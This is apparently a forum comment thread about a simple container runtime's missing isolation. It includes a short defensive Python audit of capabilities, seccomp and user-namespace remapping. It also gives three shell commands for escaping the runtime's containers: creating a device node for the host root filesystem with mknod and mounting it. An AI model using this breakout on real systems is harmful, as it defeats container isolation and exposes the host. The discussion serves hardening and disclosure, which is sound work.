by uvuv 2229 days ago
Definitely not secure. The author did a great job explaining container runtimes in basic terms, but there are a lot of security features missing. Mainly:

* Reducing the container's capabilities
* Restricting access to resources through cgroups
* Applying seccomp filters to prevent certain syscalls.

As another comment suggested, user namespaces are another hardening feature, but not all container runtimes enable it by default. Podman does, Docker doesn't. In fact, user namespaces are so powerful that I believe they pretty much cover most of the hardening provided by the three features I listed above. If you're wondering why they're not enabled by default in Docker, take a look at this [1].

Exploiting the missing isolation mechanisms, the following bash commands will allow you to escape from the author's containers:

$ ls -al /sys/dev/block # find the root fs device (e.g. /dev/sda1) major and minor device numbers (e.g. {maj=8, min=1}, {maj=259, min=1})

$ mknod --mode 0600 /dev/host_fs_dev b $major $minor

$ mkdir /host_fs && mount /dev/host_fs_dev /host_fs

(warning: shameless plug to my posts follows:)

If you want more details, I wrote a post on this exact same problem in the context of three vulnerabilities I found in rkt (another container runtime) [2].

Besides the issues above, the author's runtime also exposes host file descriptors like /proc/self/exe that can be used to escape the container. This is a post I wrote on runC CVE-2019-5736 that explains this kind of issue.

[1] https://docs.docker.com/engine/security/userns-remap/#user-n...
[2] https://unit42.paloaltonetworks.com/breaking-out-of-coresos-...
[3] https://unit42.paloaltonetworks.com/breaking-docker-via-runc...
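As an added defender-side example (not from the comment above nor from the runtime it discusses), a small Python audit that reads the two /proc files a process can consult about itself and reports whether the hardening layers listed in the comment are in effect: effective capabilities (CAP_MKNOD and CAP_SYS_ADMIN, the two the mknod/mount sequence relies on), a loaded seccomp filter, and a user-namespace uid remap. The /proc contents below are constructed samples; the capability bit numbers are those of linux/capability.h.

```python
# Capability bit numbers from linux/capability.h
CAP_SYS_ADMIN = 21   # required for mount(2) of a host block device
CAP_MKNOD = 27       # required to create device nodes with mknod(2)

# Constructed sample 1: root container with the full capability set, no seccomp
# filter (mode 0) and the identity uid_map of the initial user namespace.
UNHARDENED_STATUS = "Name:\tsh\nUid:\t0\t0\t0\t0\nCapEff:\t0000003fffffffff\nSeccomp:\t0\n"
IDENTITY_UID_MAP = "         0          0 4294967295\n"

# Constructed sample 2: the same process with CAP_MKNOD and CAP_SYS_ADMIN
# dropped, a seccomp filter loaded (mode 2) and root remapped to host uid 100000.
HARDENED_STATUS = "Name:\tsh\nUid:\t0\t0\t0\t0\nCapEff:\t00000000a00425fb\nSeccomp:\t2\n"
REMAPPED_UID_MAP = "         0     100000      65536\n"


def parse_status(status_text):
    """Turn the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def has_cap(capmask_hex, cap_bit):
    """True if cap_bit is set in a hex capability mask such as CapEff."""
    return (int(capmask_hex, 16) >> cap_bit) & 1 == 1


def in_initial_userns(uid_map_text):
    """The initial user namespace exposes the identity map '0 0 4294967295'."""
    return uid_map_text.split() == ["0", "0", "4294967295"]


def audit_container(status_text, uid_map_text):
    """Report which hardening layers are in effect for the described process."""
    fields = parse_status(status_text)
    cap_eff = fields.get("CapEff", "0")
    findings = {
        "cap_mknod": has_cap(cap_eff, CAP_MKNOD),
        "cap_sys_admin": has_cap(cap_eff, CAP_SYS_ADMIN),
        "seccomp_filter": fields.get("Seccomp") == "2",  # 2 = filter loaded
        "userns_remapped": not in_initial_userns(uid_map_text),
    }
    # Creating and mounting a host block device needs both capabilities in the
    # initial user namespace; capabilities held inside a remapped namespace do
    # not apply to host devices, so a remap closes this path on its own.
    findings["host_device_mount_possible"] = (
        findings["cap_mknod"] and findings["cap_sys_admin"]
        and not findings["userns_remapped"]
    )
    return findings


def audit_self():
    """Run the audit on the calling process itself (Linux only)."""
    with open("/proc/self/status") as status, open("/proc/self/uid_map") as uid_map:
        return audit_container(status.read(), uid_map.read())
```

Run audit_self() inside a container to see which of the layers are missing; the seccomp finding is reported separately because a filter can deny mount(2) and mknod(2) even when the capabilities are still present.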


Thank you for detailed answer and interesting links!

Could you please explain, or point me to some information or source on, why Docker can't use the --net=host namespace if userns is enabled, while on the other hand rootlesskit [1], which uses userns by default, doesn't have a problem using the host netns (--net=host)?

[1] https://github.com/rootless-containers/rootlesskit

Wow thank you!!